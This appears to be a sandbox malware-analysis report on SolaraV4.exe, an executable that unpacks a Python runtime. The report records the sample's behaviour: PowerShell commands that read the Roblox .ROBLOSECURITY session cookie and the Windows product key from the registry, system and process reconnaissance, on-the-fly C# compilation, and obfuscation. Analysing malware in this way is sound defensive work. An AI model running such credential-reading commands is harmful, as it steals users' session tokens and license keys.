Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\Desktop\pyvenv.cfg Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: SolaraV4.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SolaraV4.exe Static file information: File size 6232292 > 1048576
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SolaraV4.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: SolaraV4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV4.exe, 00000001.00000003.2466343863.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2990881493.00007FFE957E1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: SolaraV4.exe, 00000003.00000002.2991089669.00007FFE99DB1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2987871066.00007FFE784F1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: SolaraV4.exe, 00000003.00000002.2989741254.00007FFE90591000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: SolaraV4.exe, 00000003.00000002.2990037817.00007FFE90B61000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV4.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdbhP3r source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SolaraV4.exe, SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: SolaraV4.exe, 00000003.00000002.2986882718.00007FFE7651B000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:34:57 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: SolaraV4.exe, 00000003.00000002.2990354313.00007FFE94441000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb?? source: SolaraV4.exe, 00000003.00000002.2981417985.00007FFE75E15000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: SolaraV4.exe, 00000003.00000002.2989049105.00007FFE8FF81000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV4.exe, 00000003.00000002.2984685427.00007FFE760AD000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: SolaraV4.exe, 00000003.00000002.2990592997.00007FFE94AC1000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: SolaraV4.exe, 00000003.00000002.2988340988.00007FFE8F3F1000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.pdb source: powershell.exe, 00000043.00000002.2720390881.0000016199A66000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: SolaraV4.exe, 00000003.00000002.2980855878.00007FFE75D8B000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: SolaraV4.exe, 00000003.00000002.2988713456.00007FFE8FF67000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: SolaraV4.exe, 00000003.00000002.2989395110.00007FFE904EB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006C.00000000.2823194797.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006C.00000002.2839982108.00007FF7C7250000.00000002.00000001.01000000.00000021.sdmp
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SolaraV4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E502A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 3_2_00007FFE75E502A0
PE file contains an invalid checksum
Source: SolaraV4.exe Static PE information: real checksum: 0x5efae4 should be: 0x5f66c5
Source: python310.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x17995b
Source: unicodedata.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x50e34
Source: libffi-7.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _ctypes.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x13fd8
Source: _bz2.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x14310
Source: sqlite3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0xa6bab
Source: libcrypto-1_1.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x1190af
Source: libssl-1_1.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x3d4af
Source: _ssl.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x183af
Source: _queue.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0xd67b
Source: _socket.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x13b4b
Source: _hashlib.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x8c9e
Source: _decimal.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x21c60
Source: select.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x6de4
Source: _lzma.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x1fbb8
Source: _sqlite3.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x17e7a
Source: myx0gned.dll.74.dr Static PE information: real checksum: 0x0 should be: 0xa629
PE file contains sections with non-standard names
Source: libffi-7.dll.1.dr Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86E0B push rsp; ret 3_2_00007FFE75C86E13
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C89D95 push rsp; iretq 3_2_00007FFE75C89D96
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C885B7 push r12; ret 3_2_00007FFE75C885F3
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8856C push rbp; retf 3_2_00007FFE75C88585
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86D06 push r12; ret 3_2_00007FFE75C86D08
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86CDC push r8; ret 3_2_00007FFE75C86CE9
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86CFA push rdx; ret 3_2_00007FFE75C86D01
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8A4B9 push rdx; ret 3_2_00007FFE75C8A510
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C877FA push rsi; ret 3_2_00007FFE75C87831
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86F9D push r10; ret 3_2_00007FFE75C86FB0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86F42 push r12; ret 3_2_00007FFE75C86F5A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86F64 push r8; ret 3_2_00007FFE75C86F6C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C88F63 push r12; iretd 3_2_00007FFE75C88F7A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C88F0E push r12; ret 3_2_00007FFE75C88F35
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86EC6 push r10; retf 3_2_00007FFE75C86EC9
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86EE0 push r12; ret 3_2_00007FFE75C86EFE
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86E9C push rsp; iretd 3_2_00007FFE75C86E9D
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86EAB push rsi; ret 3_2_00007FFE75C86EAC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86E54 push rdi; iretd 3_2_00007FFE75C86E56
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C88E76 push rbp; iretq 3_2_00007FFE75C88E77
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C891B3 push rdi; iretd 3_2_00007FFE75C891B5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8A174 push rsp; ret 3_2_00007FFE75C8A175
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C89C12 push rsp; retf 3_2_00007FFE75C89C13
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C86C31 push r10; ret 3_2_00007FFE75C86C33
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C892F4 push r10; retf 3_2_00007FFE75C89360
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75C8A2F5 push rsp; retf 3_2_00007FFE75C8A2F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD7DEE push ss; ret 14_2_00007FFE15BD7DEF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD76A4 push ds; ret 14_2_00007FFE15BD76A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD764C push ds; ret 14_2_00007FFE15BD7650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15BD1AC9 push es; retf 14_2_00007FFE15BD1ACA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFE15CA0591 push eax; ret 14_2_00007FFE15CA0592
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
